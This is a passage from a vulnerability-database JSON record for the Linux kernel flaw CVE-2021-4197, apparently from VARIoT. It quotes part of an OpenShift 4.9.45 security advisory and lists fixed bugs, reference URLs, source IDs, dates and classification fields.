changes:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nSecurity Fix(es):\n\n* openshift: oauth-serving-cert configmap contains cluster certificate\nprivate key (CVE-2022-2403)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-x86_64\n\nThe image digest is\nsha256:8ab373599e8a010dffb9c7ed45e01c00cb06a7857fe21de102d978be4738b2ec\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-s390x\n\nThe image digest is\nsha256:1dde8a7134081c82012a812e014daca4cba1095630e6d0c74b51da141d472984\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-ppc64le\n\nThe image digest is\nsha256:ec1fac628bec05eb6425c2ae9dcd3fca120cd1a8678155350bb4c65813cfc30e\n\nAll OpenShift Container Platform 4.9 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2009024 - Unable to complete cluster destruction, some ports are left over\n2055494 - console operator should report Upgradeable False when SAN-less certs are used\n2083554 - post 1.23 rebase: regression in service-load balancer reliability\n2087021 - configure-ovs.sh fails, blocking new RHEL node from being scaled up on cluster without manual reboot\n2088539 - Openshift route  URLs starting with double slashes stopped working after update to 4.8.33 - curl version   problems\n2091806 - Cluster upgrade stuck due to \"resource deletions in progress\"\n2095320 - [4.9] Bootimage bump tracker\n2097157 - [4.9z] During ovnkube-node restart all host conntrack entries are flushed, leading to traffic disruption\n2100786 - [OCP 4.9] Ironic cannot match \"wwn\" rootDeviceHint for a multipath device\n2101664 - disabling ipv6 router advertisements using \"all\" does not disable it on secondary interfaces\n2101959 - CVE-2022-2403 openshift: oauth-serving-cert configmap contains cluster certificate private key\n2103982 - [4.9] AWS EBS CSI driver stuck removing EBS volumes - GetDeviceMountRefs check failed\n2105277 - NetworkPolicies: ovnkube-master pods crashing due to panic: \"invalid memory address or nil pointer dereference\"\n2105453 - Node reboot causes duplicate persistent volumes\n2105654 - egressIP panics with nil pointer dereference\n2105663 - APIRequestCount does not identify some APIs removed in 4.9\n2106655 - Kubelet slowly leaking memory and pods eventually unable to start\n2108538 - [4.9.z backport] br-ex not created due to default bond interface having a different mac address than expected\n2108619 - ClusterVersion history pruner does not always retain initial completed update entry\n\n5",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "db": "VULHUB",
        "id": "VHN-410862"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167602"
      },
      {
        "db": "PACKETSTORM",
        "id": "167852"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "168019"
      },
      {
        "db": "PACKETSTORM",
        "id": "167886"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-410862",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-410862"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-4197",
        "trust": 3.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "168019",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "167886",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "167852",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "167694",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167746",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167443",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168136",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166392",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167097",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167952",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167748",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167822",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167714",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167072",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202201-1396",
        "trust": 0.1
      },
      {
        "db": "CNVD",
        "id": "CNVD-2022-68560",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-410862",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166636",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167602",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167622",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167679",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-410862"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167602"
      },
      {
        "db": "PACKETSTORM",
        "id": "167852"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "168019"
      },
      {
        "db": "PACKETSTORM",
        "id": "167886"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "id": "VAR-202201-0496",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-410862"
      }
    ],
    "trust": 0.725
  },
  "last_update_date": "2024-07-23T19:59:00.365000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NTAP-20220602-0006 Oracle Oracle\u00a0Critical\u00a0Patch\u00a0Update",
        "trust": 0.8,
        "url": "https://www.broadcom.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.1
      },
      {
        "problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-410862"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://www.debian.org/security/2022/dsa-5127"
      },
      {
        "trust": 1.9,
        "url": "https://www.debian.org/security/2022/dsa-5173"
      },
      {
        "trust": 1.9,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035652"
      },
      {
        "trust": 1.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4197"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20220602-0006/"
      },
      {
        "trust": 1.1,
        "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
      },
      {
        "trust": 1.0,
        "url": "https://lore.kernel.org/lkml/20211209214707.805617-1-tj%40kernel.org/t/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-4197"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2021-4203"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3752"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4157"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3744"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-13974"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-41617"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-45485"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3773"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4002"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-43976"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-0941"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-43389"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4189"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-44733"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-1271"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3634"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4037"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-29154"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-37159"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3772"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-0404"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3669"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3764"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-20322"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-43056"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-41864"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3612"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-26401"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-27820"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3743"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3737"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-1011"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-4083"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-45486"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0322"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-4788"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0286"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0001"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3759"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-21781"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0002"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2018-25032"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-42739"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-19131"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3696"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-38185"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28733"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-21803"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-29526"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28736"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3697"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28734"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28737"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-25219"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3695"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28735"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-24785"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-29810"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1729"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-32250"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4203"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29368"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0235"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0536"
      },
      {
        "trust": 0.1,
        "url": "https://lore.kernel.org/lkml/20211209214707.805617-1-tj@kernel.org/t/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44733"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28711"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28715"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-39685"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45402"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0382"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-23222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0264"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-39698"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43975"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1021.24~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45095"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1025.30~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27666"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0742"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5368-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45480"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25645"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43565"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5201"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5626"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0492"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5392"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1154"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26691"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5483"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35492"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-34169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21540"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21540"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21541"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-34169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21541"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2403"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhba-2022:5878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2403"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5879"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2380"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1011"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28388"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1199"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1198"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28389"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1204"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5541-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1353"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-410862"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167602"
      },
      {
        "db": "PACKETSTORM",
        "id": "167852"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "168019"
      },
      {
        "db": "PACKETSTORM",
        "id": "167886"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-410862"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167602"
      },
      {
        "db": "PACKETSTORM",
        "id": "167852"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "168019"
      },
      {
        "db": "PACKETSTORM",
        "id": "167886"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-03-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-410862"
      },
      {
        "date": "2023-08-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "date": "2022-04-07T16:37:07",
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "date": "2022-06-28T15:20:26",
        "db": "PACKETSTORM",
        "id": "167602"
      },
      {
        "date": "2022-07-27T17:32:01",
        "db": "PACKETSTORM",
        "id": "167852"
      },
      {
        "date": "2022-06-29T20:27:02",
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "date": "2022-07-01T15:04:32",
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "date": "2022-08-10T15:50:18",
        "db": "PACKETSTORM",
        "id": "168019"
      },
      {
        "date": "2022-07-29T14:39:49",
        "db": "PACKETSTORM",
        "id": "167886"
      },
      {
        "date": "2022-03-23T20:15:10.200000",
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-410862"
      },
      {
        "date": "2023-08-02T06:47:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "date": "2023-11-07T03:40:21.077000",
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167886"
      }
    ],
    "trust": 0.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Authentication vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167886"
      }
    ],
    "trust": 0.2
  }
}

var-201906-1176
Vulnerability from variot

